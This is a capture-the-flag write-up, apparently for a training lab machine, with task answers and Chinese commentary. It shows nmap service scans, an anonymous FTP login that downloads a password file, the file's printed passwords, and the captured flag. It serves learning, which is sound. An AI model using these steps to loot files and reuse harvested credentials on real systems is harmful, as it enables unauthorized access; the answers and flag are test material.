# Task 1

Q:What nmap scanning switch employs the use of default scripts during a scan?

A: -sC

# Task 2

Q:What service version is found to be running on port 21?

┌──(root💀kali)-[~]
└─# nmap -sV -Pn -p21 10.129.1.15   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:47 CST
Nmap scan report for 10.129.1.15
Host is up (0.27s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds

-sV 仅检测版本号
-Pn 跳过 ping 扫描

A: vsFTPd 3.0.3

# Task 3

Q:What FTP code is returned to us for the "Anonymous FTP login allowed" message?

┌──(root💀kali)-[~]
└─# nmap -sC -Pn -p21 10.129.1.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:50 CST
Nmap scan report for 10.129.1.15
Host is up (0.51s latency).
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.16.86
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds

第 9 行能看到允许匿名登录,响应码是 230

A:230

# Task 4

Q:What command can we use to download the files we find on the FTP server?

A:get

# Task 5

Q:What is one of the higher-privilege sounding usernames in the list we retrieved?

这个需要 ftp 登录进去,然后 get 文件下来,但是根据提示直接盲猜 admin 就可以了

A:admin

# Task 6

Q:What version of Apache HTTP Server is running on the target host?

┌──(root💀kali)-[~]
└─# nmap -sV -Pn 10.129.1.15 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 15:55 CST
Nmap scan report for 10.129.1.15
Host is up (0.62s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.59 seconds

第 9 行,十分明显,我这个直接列出了所有版本号,可以定点查询加参数 -p80


A:2.4.41

# Task 7

Q:What is the name of a handy web site analysis plug-in we can install in our browser?

A:wappalyzer

# Task 8

Q:What switch can we use with gobuster to specify we are looking for specific filetypes?

A: -x

# Task 9

Q:What file have we found that can provide us a foothold on the target?

A:login.php

# Flag

ftp 登录进去,下载密码文件

┌──(root💀kali)-[~]
└─# ftp 10.129.1.15
Connected to 10.129.1.15.
220 (vsFTPd 3.0.3)
Name (10.129.1.15:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
226 Directory send OK.
ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
226 Transfer complete.
62 bytes received in 0.00 secs (197.2211 kB/s)
ftp> exit
221 Goodbye.

他这个第四个是 admin 的密码

┌──(root💀kali)-[~]
└─# cat allowed.userlist.passwd 
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd

直接用 admin 登录进去,得到 flag

flag: c7110277ac44d78b6a9fff2232434d16